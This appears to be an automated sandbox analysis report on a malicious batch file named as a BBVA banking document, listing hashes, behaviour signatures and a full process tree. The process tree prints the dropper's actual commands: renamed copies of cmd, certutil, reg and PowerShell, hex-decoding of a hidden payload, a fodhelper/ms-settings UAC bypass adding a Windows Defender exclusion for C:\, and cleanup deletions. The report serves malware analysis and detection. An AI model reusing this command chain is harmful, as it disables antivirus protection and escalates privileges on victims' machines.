1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df

General

Target

BBVA_74008300085000288003.bat
Size

3.0MB
MD5

17c7045b36fae5916e2900899e40fcdc
SHA1

793de1034b8dbce1547b85d7348324e8fb5d0106
SHA256

1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df
SHA512

f4be2aa7efaad65542147360369292774d242c0cc8ab6489036f601b9e914642a3183d0a2b0130d216e2b40baaebf368395cf755a5680999c2e83cfcdf899e46
SSDEEP

49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4K3:x

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 24 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
1724	alpha.exe
2272	alpha.exe
2320	alpha.exe
1584	alpha.exe
2152	kn.exe
1772	alpha.exe
2984	alpha.exe
2564	alpha.exe
2556	alpha.exe
2804	xkn.exe
2524	alpha.exe
2388	ger.exe
2500	alpha.exe
2532	kn.exe
2936	alpha.exe
2256	Ping_c.pif
2040	alpha.exe
556	alpha.exe
1868	alpha.exe
1864	alpha.exe
2592	alpha.exe
2588	alpha.exe
2716	alpha.exe
2624	alpha.exe

Loads dropped DLL 18 IoCs

Processes:

cmd.exealpha.exealpha.exexkn.exealpha.exealpha.exeWerFault.exe

pid	process
2156	cmd.exe
2156	cmd.exe
2156	cmd.exe
2156	cmd.exe
1584	alpha.exe
2156	cmd.exe
2156	cmd.exe
2156	cmd.exe
2156	cmd.exe
2556	alpha.exe
2804	xkn.exe
2804	xkn.exe
2804	xkn.exe
2524	alpha.exe
2156	cmd.exe
2500	alpha.exe
1944	WerFault.exe
1944	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1944 2256 WerFault.exe Ping_c.pif
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1060 taskkill.exe

pid	pid_target	process	target process
1944	2256	WerFault.exe	Ping_c.pif

pid	process
1060	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Ping_c.pif

pid process

2256 Ping_c.pif
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

2804 xkn.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

xkn.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2804 xkn.exe
Token: SeDebugPrivilege 1060 taskkill.exe

pid	process
2256	Ping_c.pif

pid	process
2804	xkn.exe

description	pid	process
Token: SeDebugPrivilege	2804	xkn.exe
Token: SeDebugPrivilege	1060	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2156 wrote to memory of 300	2156	cmd.exe	extrac32.exe
PID 2156 wrote to memory of 300	2156	cmd.exe	extrac32.exe
PID 2156 wrote to memory of 300	2156	cmd.exe	extrac32.exe
PID 2156 wrote to memory of 1724	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 1724	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 1724	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2272	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2272	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2272	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2320	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2320	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2320	2156	cmd.exe	alpha.exe
PID 2320 wrote to memory of 2444	2320	alpha.exe	extrac32.exe
PID 2320 wrote to memory of 2444	2320	alpha.exe	extrac32.exe
PID 2320 wrote to memory of 2444	2320	alpha.exe	extrac32.exe
PID 2156 wrote to memory of 1584	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 1584	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 1584	2156	cmd.exe	alpha.exe
PID 1584 wrote to memory of 2152	1584	alpha.exe	kn.exe
PID 1584 wrote to memory of 2152	1584	alpha.exe	kn.exe
PID 1584 wrote to memory of 2152	1584	alpha.exe	kn.exe
PID 2156 wrote to memory of 1772	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 1772	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 1772	2156	cmd.exe	alpha.exe
PID 1772 wrote to memory of 2988	1772	alpha.exe	extrac32.exe
PID 1772 wrote to memory of 2988	1772	alpha.exe	extrac32.exe
PID 1772 wrote to memory of 2988	1772	alpha.exe	extrac32.exe
PID 2156 wrote to memory of 2984	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2984	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2984	2156	cmd.exe	alpha.exe
PID 2984 wrote to memory of 2512	2984	alpha.exe	extrac32.exe
PID 2984 wrote to memory of 2512	2984	alpha.exe	extrac32.exe
PID 2984 wrote to memory of 2512	2984	alpha.exe	extrac32.exe
PID 2156 wrote to memory of 2564	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2564	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2564	2156	cmd.exe	alpha.exe
PID 2564 wrote to memory of 2640	2564	alpha.exe	extrac32.exe
PID 2564 wrote to memory of 2640	2564	alpha.exe	extrac32.exe
PID 2564 wrote to memory of 2640	2564	alpha.exe	extrac32.exe
PID 2156 wrote to memory of 2556	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2556	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2556	2156	cmd.exe	alpha.exe
PID 2556 wrote to memory of 2804	2556	alpha.exe	xkn.exe
PID 2556 wrote to memory of 2804	2556	alpha.exe	xkn.exe
PID 2556 wrote to memory of 2804	2556	alpha.exe	xkn.exe
PID 2804 wrote to memory of 2524	2804	xkn.exe	alpha.exe
PID 2804 wrote to memory of 2524	2804	xkn.exe	alpha.exe
PID 2804 wrote to memory of 2524	2804	xkn.exe	alpha.exe
PID 2524 wrote to memory of 2388	2524	alpha.exe	ger.exe
PID 2524 wrote to memory of 2388	2524	alpha.exe	ger.exe
PID 2524 wrote to memory of 2388	2524	alpha.exe	ger.exe
PID 2156 wrote to memory of 2500	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2500	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2500	2156	cmd.exe	alpha.exe
PID 2500 wrote to memory of 2532	2500	alpha.exe	kn.exe
PID 2500 wrote to memory of 2532	2500	alpha.exe	kn.exe
PID 2500 wrote to memory of 2532	2500	alpha.exe	kn.exe
PID 2156 wrote to memory of 2936	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2936	2156	cmd.exe	alpha.exe
PID 2156 wrote to memory of 2936	2156	cmd.exe	alpha.exe
PID 2936 wrote to memory of 1060	2936	alpha.exe	taskkill.exe
PID 2936 wrote to memory of 1060	2936	alpha.exe	taskkill.exe
PID 2936 wrote to memory of 1060	2936	alpha.exe	taskkill.exe
PID 2156 wrote to memory of 2256	2156	cmd.exe	Ping_c.pif

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
2⤵
PID:300

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
2⤵
- Executes dropped EXE
PID:1724

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:2272

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2444

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1584

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BBVA_74008300085000288003.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
3⤵
- Executes dropped EXE
PID:2152

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
3⤵
PID:2988

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2984

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
3⤵
PID:2512

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
3⤵
PID:2640

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2556

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2524

C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
5⤵
- Executes dropped EXE
- Modifies registry class
PID:2388

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2500

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
3⤵
- Executes dropped EXE
PID:2532

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 780
3⤵
- Loads dropped DLL
- Program crash
PID:1944

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
2⤵
- Executes dropped EXE
PID:2040

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:556

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
2⤵
- Executes dropped EXE
PID:1868

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1864

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2592

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2588

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2716

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2624

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Libraries\Ping_c.pif
Filesize
1.1MB

MD5
962c746f045885ca2883fec129a5bb98

SHA1
bdad34f489b6a8b3a3101d658ea426805e859473

SHA256
8b5cbf4eba7ce848616eda92a3eaea0372a7a97efba05ce2ebfac5c99c243e71

SHA512
45cd944310a28216835eea924cd03c668b948ccab63a7b6489453a69bf6a7f160d105e9879096580d571e7af1ab4deea02ec506f57f48e370b8c5918c44cdb83

Download Submit
C:\Users\Public\Ping_c.mp4
Filesize
2.2MB

MD5
18fbc4b3cab1f954789cf7649dcd1dff

SHA1
661ba52bd44e913cd74b214e1652843f1f894e1c

SHA256
4bb6bb0afbf65b0bdf0d5f0963c1133f3a0d049557d485d185e1e65b5b84987a

SHA512
de11b7621e1170f0f6d0efa75d2b75456a5b3d677d865ab07ad157b1e7ad7eec175404500e92806e7c20085512b82ad2db2c0eb83377baacd24d0500b5e501c3

Download Submit
C:\Users\Public\alpha.exe
Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
C:\Users\Public\ger.exe
Filesize
73KB

MD5
9d0b3066fe3d1fd345e86bc7bcced9e4

SHA1
e05984a6671fcfecbc465e613d72d42bda35fd90

SHA256
4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

SHA512
d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

Download Submit
C:\Users\Public\kn.exe
Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
C:\Users\Public\xkn.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2256-72-0x0000000000400000-0x0000000000522000-memory.dmp

Filesize
1.1MB

Download
memory/2804-44-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/2804-43-0x000000001B4B0000-0x000000001B792000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads